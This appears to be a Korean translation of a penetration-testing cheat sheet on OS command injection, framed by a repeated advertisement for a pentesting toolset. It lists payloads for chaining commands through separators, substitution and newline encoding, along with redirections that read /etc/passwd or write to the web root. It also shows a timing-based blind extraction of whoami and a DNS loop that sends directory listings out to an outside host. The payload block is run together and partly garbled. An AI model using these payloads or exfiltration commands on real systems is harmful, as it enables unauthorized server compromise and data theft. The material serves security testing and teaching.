실제 비즈니스에 영향을 미치는 중요한 취약점을 찾아보고 보고하세요. 공격 표면을 매핑하고 권한 상승을 허용하는 보안 문제를 찾아내며, 필수 증거를 수집하기 위해 자동화된 익스플로잇을 사용하여 귀하의 노력을 설득력 있는 보고서로 전환하는 20개 이상의 맞춤형 도구를 사용하세요.
Command Injection이란 무엇인가?
command injection은 공격자가 애플리케이션을 호스팅하는 서버에서 임의의 운영 체제 명령을 실행할 수 있도록 허용합니다. 그 결과, 애플리케이션과 그 모든 데이터가 완전히 손상될 수 있습니다. 이러한 명령의 실행은 일반적으로 공격자가 애플리케이션의 환경 및 기본 시스템에 대한 무단 접근 또는 제어를 얻을 수 있게 합니다.
Context
입력이 주입되는 위치에 따라 명령을 실행하기 전에 인용된 컨텍스트를 종료해야 할 수도 있습니다 (" 또는 ' 사용).
Command Injection/Execution
#Both Unix and Windows supportedls||id; ls||id; ls||id; ls||id# Execute bothls|id; ls|id; ls|id; ls|id# Execute both (using a pipe)ls&&id; ls&&id; ls&&id; ls&&id# Execute 2º if 1º finish okls&id; ls&id; ls&id; ls&id# Execute both but you can only see the output of the 2ºls%0Aid# %0A Execute both (RECOMMENDED)#Only unix supported`ls`# ``$(ls) # $()ls; id# ; Chain commandsls${LS_COLORS:10:1}${IFS}id# Might be useful#Not executed but may be interesting> /var/www/html/out.txt #Try to redirect the output to a file< /etc/passwd #Try to send some input to the command
제한 우회
리눅스 머신 내에서 임의의 명령을 실행하려고 한다면, 이 우회에 대해 읽어보는 것이 좋습니다:
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
DNS 기반 데이터 유출
https://github.com/HoLyVieR/dnsbin에서 제공되는 도구를 기반으로 하며, dnsbin.zhack.ca에서도 호스팅됩니다.
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
실제 비즈니스에 영향을 미치는 중요한 취약점을 찾아보고 보고하세요. 20개 이상의 맞춤형 도구를 사용하여 공격 표면을 매핑하고, 권한 상승을 허용하는 보안 문제를 찾아내며, 자동화된 익스플로잇을 사용하여 필수 증거를 수집하여 귀하의 노력을 설득력 있는 보고서로 전환하세요.